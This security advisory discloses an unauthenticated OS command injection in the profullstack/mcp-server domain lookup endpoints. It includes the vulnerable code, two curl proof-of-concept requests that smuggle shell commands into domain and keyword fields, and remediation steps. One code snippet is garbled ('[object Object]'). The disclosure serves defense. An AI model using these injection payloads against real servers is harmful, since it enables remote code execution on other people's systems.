PT-2026-41811 · Npm · @Profullstack/Mcp-Server
Published
2026-05-09
·
Updated
2026-05-09
CVSS v3.1
9.8
Critical
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Security Advisory: OS Command Injection in profullstack/mcp-server domain lookup Module
| Field | Value |
|---|---|
| Project | profullstack/mcp-server |
| Repository | https://github.com/profullstack/mcp-server |
| Affected Commit | 2e8ea913573610667ad54e31dba2e8198ebf7cf9 |
| Affected Module | mcp modules/domain lookup |
| Affected Endpoints | POST /domain-lookup/check, POST /domain-lookup/bulk |
| Vulnerability Type | CWE-78: OS Command Injection |
| CVSS 3.1 Score | 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Authentication Required | None |
| Default Network Exposure | Bind address 0.0.0.0, no global authentication middleware |
| Validated | 2026-04-21 (initial), 2026-04-28 (re-confirmed) |
Summary
The
domain lookup module assembles a shell command string by concatenating user-controlled input (domains / keywords) and passes it to execAsync(). Both HTTP endpoints reach the same sink. Because there is no argument quoting, escaping, or allowlist — and no authentication on the server — an unauthenticated remote attacker can execute arbitrary OS commands as the server process.Affected Code
index.js:27— server binds to0.0.0.0, no global auth middleware.mcp modules/domain lookup/index.js:52— registersPOST /domain-lookup/check.mcp modules/domain lookup/index.js:55— registersPOST /domain-lookup/bulk.mcp modules/domain lookup/src/service.js:19, :20—buildTldxCommand()concatenates user input into the shell string.mcp modules/domain lookup/src/service.js:114, :115, :142—execAsync(command)sink reached from both routes.
Vulnerable Code
File:
mcp modules/domain lookup/src/service.jsStep 1 — User input concatenated directly into a shell string:
js
buildTldxCommand(keywords, options = {}) { let command = `tldx ${keywords.join(' ')}`;if (options.prefixes?.length) { command += ,[object Object],; } }
Step 2 — That shell string is executed as-is:
js
async checkDomainAvailability(domains, options = {}) {
try {
const command = this.buildTldxCommand(domains, options);
const { stdout, stderr } = await execAsync(command);There is no sanitization between Step 1 and Step 2. Shell metacharacters (
;, |, $(), etc.) in user input are interpreted by /bin/sh at execution time.Proof of Concept
Tested against a local Docker build of the affected commit (
0.0.0.0:13000->3000/tcp).PoC A — POST /domain-lookup/check
Request:
bash
curl -X POST http://localhost:13000/domain-lookup/check
-H 'Content-Type: application/json'
-d '{"domains":["example.com; echo final check poc > /tmp/verify-exports/final check.txt; #"]}'Response:
HTTP/1.1 500 Internal Server Error access-control-allow-origin: * content-type: application/json Date: Tue, 21 Apr 2026 04:32:39 GMT{"error":"tldx command failed: tldx command failed: /bin/sh: tldx: not found "}
Side effect confirmed inside container:
$ cat /tmp/verify-exports/final check.txt
final check pocPoC B — POST /domain-lookup/bulk
Request:
bash
curl -X POST http://localhost:13000/domain-lookup/bulk
-H 'Content-Type: application/json'
-d '{"keywords":["safe","x; echo final bulk poc > /tmp/verify-exports/final bulk.txt; #"]}'Response:
HTTP/1.1 500 Internal Server Error access-control-allow-origin: * content-type: application/json Date: Tue, 21 Apr 2026 04:32:40 GMT{"error":"Bulk domain check failed: Bulk domain check failed: /bin/sh: tldx: not found "}
Side effect confirmed inside container:
$ cat /tmp/verify-exports/final bulk.txt
final bulk pocNote on HTTP 500
Both requests return HTTP 500 because
tldx is not installed in the test container. The injected commands are interpreted by the shell before tldx is invoked. The marker files confirm that attacker-controlled commands executed successfully despite the 500 response. In a production environment where tldx is installed, both the intended function and the injected commands execute.Impact
- Unauthenticated remote code execution as the server process UID.
- Full read/write access to any file the server process can access.
- Potential for outbound connections, credential theft, persistence, and lateral movement.
- Reproducible with a single unauthenticated HTTP POST to either of two documented endpoints.
Suggested Remediation
- Replace
execAsync(command)withchild process.execFileorspawn('tldx', [keyword1, keyword2, ...])— pass arguments as an array, never as a concatenated shell string. - Validate all domain/keyword input against a strict allowlist (RFC 1035 hostname syntax) before invoking the external binary; reject any input containing shell metacharacters.
- Add a global authentication middleware so all HTTP-exposed modules are not callable anonymously.
- Default the server bind address to
127.0.0.1and require explicit opt-in for non-loopback bindings.
Verification Environment
- Local Docker container only; no third-party deployment was tested.
- The container does not include the
tldxbinary; this is intentional for safe local PoC and does not affect exploitability.
Fix
OS Command Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
@Profullstack/Mcp-Server